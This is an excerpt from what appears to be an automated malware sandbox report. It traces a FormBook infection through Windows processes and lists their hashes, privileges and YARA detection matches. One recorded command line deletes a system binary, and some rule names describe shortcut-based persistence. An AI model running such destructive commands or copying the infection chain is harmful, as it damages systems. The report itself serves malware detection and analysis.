                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000013.00000003.465981030.0000000002DA8000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000013.00000003.465812677.0000000002DE4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)

                                                                                General

                                                                                Start time:16:16:18
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\System32\mshta.exe
                                                                                Imagebase:0x2d0000
                                                                                File size:13312 bytes
                                                                                MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                General

                                                                                Start time:16:16:26
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                Imagebase:0xce0000
                                                                                File size:61952 bytes
                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

General

Start time: 16:16:30
Start date: 03/08/2021
Path: C:\Windows\SysWOW64\secinit.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\secinit.exe
Imagebase: 0xa70000
File size: 9728 bytes
MD5 hash: 174A363BB5A2D88B224546C15DD10906
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

General

Start time: 16:16:31
Start date: 03/08/2021
Path: C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit): false
Commandline: C:\Windows\SysWOW64\autoconv.exe
Imagebase: 0x970000
File size: 851968 bytes
MD5 hash: 4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 16:16:32
Start date: 03/08/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Windows\SysWOW64\mshta.exe'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 16:16:33
Start date: 03/08/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 16:16:33
Start date: 03/08/2021
Path: C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit): false
Commandline: C:\Windows\SysWOW64\autoconv.exe
Imagebase: 0x970000
File size: 851968 bytes
MD5 hash: 4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 16:16:34
Start date: 03/08/2021
Path: C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit): false
Commandline: C:\Windows\SysWOW64\autoconv.exe
Imagebase: 0x970000
File size: 851968 bytes
MD5 hash: 4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 16:16:35
Start date: 03/08/2021
Path: C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase: 0x260000
File size: 32768 bytes
MD5 hash: 4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

Disassembly

Code Analysis
